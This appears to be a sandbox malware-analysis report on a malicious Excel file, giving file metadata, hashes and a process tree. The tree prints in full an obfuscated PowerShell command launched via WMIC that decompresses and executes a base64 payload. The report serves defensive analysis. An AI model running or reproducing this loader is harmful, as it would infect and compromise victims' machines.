File name: | MIL0001537426.xls |
Full analysis: | https://app.any.run/tasks/a01b238d-c7c4-4d24-9ecd-ac8dcfd2d457 |
Verdict: | Malicious activity |
Analysis date: | September 11, 2019, 07:45:27 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/vnd.ms-excel |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Mon Sep 9 09:33:00 2019, Last Saved Time/Date: Mon Sep 9 09:37:00 2019, Security: 0 |
MD5: | F564E32039FD930A7688A7325B3EC5FB |
SHA1: | 2526A64145F814F8C1760A531F22DE3CF8F4A4CF |
SHA256: | 4BB516D3E5546A1EE287ABE9A2B6FA3FBEF3B6092A49EDF13D2BB19CC1C00850 |
SSDEEP: | 1536:zP5HNfeQuP8mo1X9rlnSYYcMA+eIFAlYkRIbTkKBEqEXugsCZmbpoahZhC0cixI9:zP5HNfeQu8mo1X9rlnSYYcMA+eIFAlYu |
.xls | | | Microsoft Excel sheet (78.9) |
---|
CompObjUserType: | Foglio di lavoro di Microsoft Excel 2003 |
---|---|
CompObjUserTypeLen: | 41 |
HeadingPairs: |
|
TitleOfParts: | allegati |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
Company: | - |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
ModifyDate: | 2019:09:09 08:37:00 |
CreateDate: | 2019:09:09 08:33:00 |
Software: | Microsoft Excel |
LastModifiedBy: | - |
Author: | - |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2896 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Version: 14.0.6024.1000 | ||||
4008 | wMIc 'pRoCEss' 'CALL' "cREate" "POWeRsHEll -NOprOf -WiN 00000000000000000000001 -EP byPass -nONiNtErac $K03 = [STRing][CHAr]34 ;$7HE =([CHAr]44).TOSTRinG() ;"\".(${K03}{0}{1}${K03} -f's'${7HE}'al') ('Re') (${K03}{0}{2}{1}${K03}-f'N'${7HE}'-Object'${7HE}'ew');.(${K03}{0}{1}${K03}-f 's'${7HE}'al') ('Er') (${K03}{1}{0}${K03}-f 'x'${7HE}'iE');Er(Re io.COMpResSion.DEFLATEsTREAM([sYSTEm.io.mEmORyStrEAM] [COnVeRt]::frOmBaSe64StrIng( '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' ) ${7HE} [iO.COmpREsSiON.compRESSiOnMode]::decOmprEsS)|% {Re io.STreAMrEADeR( `$_ ${7HE} [texT.ENcodInG]::utf8 ) } ).rEADtoeNd( )"\" |ieX" | C:\Windows\System32\Wbem\wMIc.exe | — | EXCEL.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: WMI Commandline Utility Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2588 | POWeRsHEll -NOprOf -WiN 00000000000000000000001 -EP byPass -nONiNtErac $K03 = [STRing][CHAr]34 ;$7HE =([CHAr]44).TOSTRinG() ;"\".(${K03}{0}{1}${K03} -f's'${7HE}'al') ('Re') (${K03}{0}{2}{1}${K03}-f'N'${7HE}'-Object'${7HE}'ew');.(${K03}{0}{1}${K03}-f 's'${7HE}'al') ('Er') (${K03}{1}{0}${K03}-f 'x'${7HE}'iE');Er(Re io.COMpResSion.DEFLATEsTREAM([sYSTEm.io.mEmORyStrEAM] [COnVeRt]::frOmBaSe64StrIng( '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